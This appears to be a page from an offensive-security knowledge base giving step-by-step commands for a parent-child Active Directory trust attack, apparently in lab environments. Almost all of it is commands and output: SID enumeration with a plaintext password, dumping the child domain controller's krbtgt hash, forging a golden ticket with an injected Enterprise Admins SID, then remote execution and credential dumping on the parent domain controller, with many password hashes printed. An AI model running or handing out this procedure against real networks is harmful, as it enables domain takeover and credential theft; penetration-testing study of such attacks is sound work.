Malleum Knowledge Base

Attacking Domain Trusts

3 min read

At a high level, a domain trust establishes the ability for users in one domain to authenticate to resources or act as a security principal in another domain.

Parent-Child Sid Injection Attack

This attack can be done when we have compromised the Child domain

Lookupsid for child domain

lookupsid.py ops.comply.com/pete@172.16.181.165

// Enter the password
0998ASDaas2

Output

[*] Brute forcing SIDs at 172.16.181.165
[*] StringBinding ncacn_np:172.16.181.165[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2032401531-514583578-4118054891
500: OPS\Administrator (SidTypeUser)
501: OPS\Guest (SidTypeUser)
502: OPS\krbtgt (SidTypeUser)
512: OPS\Domain Admins (SidTypeGroup)
513: OPS\Domain Users (SidTypeGroup)
514: OPS\Domain Guests (SidTypeGroup)
515: OPS\Domain Computers (SidTypeGroup)
516: OPS\Domain Controllers (SidTypeGroup)
517: OPS\Cert Publishers (SidTypeAlias)
520: OPS\Group Policy Creator Owners (SidTypeGroup)
521: OPS\Read-only Domain Controllers (SidTypeGroup)
522: OPS\Cloneable Domain Controllers (SidTypeGroup)
525: OPS\Protected Users (SidTypeGroup)
526: OPS\Key Admins (SidTypeGroup)
553: OPS\RAS and IAS Servers (SidTypeAlias)
571: OPS\Allowed RODC Password Replication Group (SidTypeAlias)
572: OPS\Denied RODC Password Replication Group (SidTypeAlias)
1000: OPS\CDC07$ (SidTypeUser)
1101: OPS\DnsAdmins (SidTypeAlias)
1102: OPS\DnsUpdateProxy (SidTypeGroup)
1103: OPS\COMPLY$ (SidTypeUser)
1104: OPS\pete (SidTypeUser)
1105: OPS\PROXY01$ (SidTypeUser)
1106: OPS\JUMP09$ (SidTypeUser)
1107: OPS\FILE06$ (SidTypeUser)
1108: OPS\FileAdmin (SidTypeGroup)
1109: OPS\nina (SidTypeUser)
1110: OPS\ForeignFileAdmin (SidTypeAlias)

Lookupsid for parent domain

lookupsid.py ops.comply.com/pete@172.16.181.160

Output

[*] Brute forcing SIDs at 172.16.181.160
[*] StringBinding ncacn_np:172.16.181.160[\pipe\lsarpc]
Domain SID is: S-1-5-21-1135011135-3178090508-3151492220
498: COMPLY\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: COMPLY\Administrator (SidTypeUser)
501: COMPLY\Guest (SidTypeUser)
502: COMPLY\krbtgt (SidTypeUser)
512: COMPLY\Domain Admins (SidTypeGroup)
513: COMPLY\Domain Users (SidTypeGroup)
514: COMPLY\Domain Guests (SidTypeGroup)
515: COMPLY\Domain Computers (SidTypeGroup)
516: COMPLY\Domain Controllers (SidTypeGroup)
517: COMPLY\Cert Publishers (SidTypeAlias)
518: COMPLY\Schema Admins (SidTypeGroup)
519: COMPLY\Enterprise Admins (SidTypeGroup)
520: COMPLY\Group Policy Creator Owners (SidTypeGroup)
521: COMPLY\Read-only Domain Controllers (SidTypeGroup)
522: COMPLY\Cloneable Domain Controllers (SidTypeGroup)
525: COMPLY\Protected Users (SidTypeGroup)
526: COMPLY\Key Admins (SidTypeGroup)
527: COMPLY\Enterprise Key Admins (SidTypeGroup)
553: COMPLY\RAS and IAS Servers (SidTypeAlias)
571: COMPLY\Allowed RODC Password Replication Group (SidTypeAlias)
572: COMPLY\Denied RODC Password Replication Group (SidTypeAlias)
1000: COMPLY\RDC02$ (SidTypeUser)
1101: COMPLY\DnsAdmins (SidTypeAlias)
1102: COMPLY\DnsUpdateProxy (SidTypeGroup)
1103: COMPLY\nicky (SidTypeUser)
1104: COMPLY\OPS$ (SidTypeUser)
1105: COMPLY\COMPLYEDGE$ (SidTypeUser)

Get NT-Hash of krbtgt from Child domain DC

cme smb 172.16.181.165 -u pete -p 0998ASDaas2 --ntds -d ops.comply.com

Output

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c7865e6e30e54e8845aad091b0ff447:::

Forge the ticket for Administrator of Parent Domain using nthash of krbtgt

ticketer.py -nthash 7c7865e6e30e54e8845aad091b0ff447 -domain ops.comply.com -domain-sid S-1-5-21-2032401531-514583578-4118054891 -extra-sid S-1-5-21-1135011135-3178090508-3151492220-519 Administrator

On new windows machine we need to use aes keys.

ticketer.py -aesKey b0eb79f35055af9d61bcbbe8ccae81d98cf63215045f7216ffd1f8e009a75e8d -domain corp.ghost.htb -domain-sid S-1-5-21-2034262909-2733679486-179904498 -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 Administrator

Output

Impacket v0.12.0.dev1+20240308.164415.4a62f391 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for ops.comply.com/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Export the Administrator ticket


psexec.py ops.comply.com/nicky@RDC02.comply.com -k -no-pass -target-ip 172.16.181.160

psexec.py ops.comply.com/Administrator@RDC02.comply.com -k -no-pass -target-ip 172.16.181.160

secretsdump.py ops.comply.com/Administrator@RDC02.comply.com -k -no-pass -target-ip 172.16.181.160

Administrator:500:aad3b435b51404eeaad3b435b51404ee:069c3e9d2a2945f9f8c89457e395a949:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b03491290492036a4ce26d9221d8978b:::
comply.com\nicky:1103:aad3b435b51404eeaad3b435b51404ee:a71ad837cd4a6fcd8fd0fedc62c9b209:::
RDC02$:1000:aad3b435b51404eeaad3b435b51404ee:2c65002cf5e7b7ea0d05b06dbcb6a93e:::
OPS$:1104:aad3b435b51404eeaad3b435b51404ee:82a2b05513c42741c6ef06ac798b7cfb:::
COMPLYEDGE$:1105:aad3b435b51404eeaad3b435b51404ee:4549d11a9a6fbf035a9d94c8fa2435ff:::

Enumerate

Get-DomainTrust -API

Get-DomainTrust -Domain

Graph View